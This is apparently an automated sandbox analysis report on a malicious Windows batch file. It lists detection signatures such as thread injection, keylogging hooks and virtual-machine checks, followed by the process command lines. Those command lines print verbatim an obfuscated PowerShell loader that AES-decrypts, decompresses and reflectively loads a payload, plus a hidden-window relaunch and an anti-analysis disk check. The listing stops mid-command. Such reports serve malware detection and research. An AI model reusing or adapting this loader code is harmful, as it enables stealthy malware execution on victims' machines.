Windows
Analysis Report
uy2g7z.bat
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected Powershell decrypt and execute
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Found large BAT file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive service information (via WMI, MSSMBios_RawSMBiosTables, often done to detect sandboxes)
Queries temperature or sensor information (via WMI often done to detect virtual machines)
Suspicious powershell command line found
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
cmd.exe (PID: 8328 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\uy2g7 z.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 8336 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 8380 cmdline:
powershell -windowst yle hidden -command "Start-Pro cess -File Path 'C:\U sers\user\ Desktop\uy 2g7z.bat' -ArgumentL ist 'wjzJM HoFZaIaceA GUG' -Wind owStyle Hi dden" MD5: 04029E121A0CFA5991749937DD22A1D9) cmd.exe (PID: 8508 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\uy2g7 z.bat" wjz JMHoFZaIac eAGUG " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 8516 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 8560 cmdline:
powershell .exe "if ( (Get-WmiOb ject Win32 _DiskDrive | Select- Object -Ex pandProper ty Model | findstr / i 'WDS100T 2B0A') -an d (-not (G et-ChildIt em -Path F :\ -Recurs e | Where- Object { - not $_.PSI sContainer } | Measu re-Object) .Count)) { exit 900} else {exit 1}" MD5: 04029E121A0CFA5991749937DD22A1D9) findstr.exe (PID: 8680 cmdline:
"C:\Window s\system32 \findstr.e xe" /i WDS 100T2B0A MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) cmd.exe (PID: 8740 cmdline:
cmd.exe /c echo func tion cuoF( $vrVB){ In voke-Expre ssion -Ver bose -Debu g '$TaCK=3 5[S35ys35t e35m35.S35 e35cu35r35 i35t35y35. 35C35ry35p t35o35g35r 35ap35hy35 .35A35e35s 35]:35:35C 35r35e35a3 5te35(35); '.Replace( '35', ''); Invoke-Ex pression - Informatio nAction Ig nore '$TaC K.3sMo3sde 3s=[3sS3sy s3st3sem3s .3sS3se3sc 3su3sr3sit 3sy.3sC3sr 3sy3spt3so g3sr3sa3sp 3sh3sy.3sC 3si3sp3sh3 se3srM3so3 sde3s]3s:3 s:3sC3sBC3 s;'.Replac e('3s', '' ); Invoke- Expression -Verbose -Debug -In formationA ction Igno re '$TaCK. sRPasRddsR insRgsR=[s RSsRyssRts ResRmsR.sR SsResRcusR risRtsRysR .sRCrsRyps RtsRosRgsR rsRapsRhsR ysR.sRPsRa sRddsRisRn gsRMsRosRd sResR]:sR: sRPsRKsRCs RSsR7;'.Re place('sR' , ''); Inv oke-Expres sion -Warn ingAction Inquire -I nformation Action Ign ore '$TaCK .6iKe6iy=6 i[S6iy6ist 6ie6im.6iC 6io6in6iv6 ie6ir6it]6 i::6iF6ir6 io6imB6ias 6ie6i66i46 iS6itr6ii6 in6ig6i("6 ieX6iAI6iQ p6iH6iXC6i I6iSA6iu6i r6iB6ic6iL 6i+6icB6i4 j6i66iW6il 6i4f6irm6i b6i76i/6i6 6ihB6ig6ir 6iJ6iH6i26 icK6iI6i=" );'.Replac e('6i', '' ); Invoke- Expression -WarningA ction Inqu ire -Debug -Informat ionAction Ignore -Ve rbose '$Ta CK.pJIVpJ= [pJSypJspJ tepJmpJ.Cp JopJnpJvpJ epJrpJtpJ] :pJ:FpJrpJ opJmpJBapJ sepJ6pJ4pJ SpJtpJripJ npJgpJ("pJ LypJW7pJoc pJepJGopJ3 pJ6XpJZpJl pJqpJrpJEp JEpJ5xpJlQ pJ=pJ=");' .Replace(' pJ', ''); $HzNF=$TaC K.CreateDe cryptor(); $gTTC=$Hz NF.Transfo rmFinalBlo ck($vrVB, 0, $vrVB.L ength); $H zNF.Dispos e(); $TaCK .Dispose() ; $gTTC;}f unction pp FM($vrVB){ Invoke-Ex pression - Informatio nAction Ig nore -Warn ingAction Inquire -D ebug '$BYb D=uwNeuww- uwObuwjuwe cuwtuw Suw yuwsuwtuwe uwmuw.uwIO uw.Muweuwm uwouwryuwS tuwruweuwa uwmuw(,$vr VB);'.Repl ace('uw', ''); Invok e-Expressi on -Inform ationActio n Ignore - WarningAct ion Inquir e -Debug - Verbose '$ aohN=uwNeu ww-uwObuwj uwecuwtuw Suwyuwsuwt uweuwmuw.u wIOuw.Muwe uwmuwouwry uwStuwruwe uwauwmuw;' .Replace(' uw', ''); Invoke-Exp ression -W arningActi on Inquire -Debug -I nformation Action Ign ore '$rQYH =QuNeQuw-Q uObQujQuec QutQu SQuy QusQutQueQ umQu.QuIOQ u.CQuoQumQ upQureQuss QuiQuoQunQ u.QuGZQuiQ upQuSQutQu rQueaQum($ BYbD, Qu[I QuO.QuCoQu mQuprQueQu ssQuiQuoQu nQu.QuCQuo QumpQureQu sQusQuiQuo nQuMoQudQu eQu]Qu:Qu: DQueQucQuo QumQupQure QusQus);'. Replace('Q u', ''); $ rQYH.CopyT o($aohN); $rQYH.Disp ose(); $BY bD.Dispose (); $aohN. Dispose(); $aohN.ToA rray();}fu nction QIG O($vrVB,$B CHx){ Invo ke-Express ion -Verbo se -Warnin gAction In quire '$lH pd=oR[SoRy soRteoRmoR .RoReoRflo ReoRcoRtoR ioRooRnoR. AoRssoReoR moRboRlyoR ]:oR:oRLoR ooRaoRd([b yte[]]$vrV B);'.Repla ce('oR', ' '); Invoke -Expressio n -Debug - WarningAct ion Inquir e '$AEjb=$ lHpd.OBEnO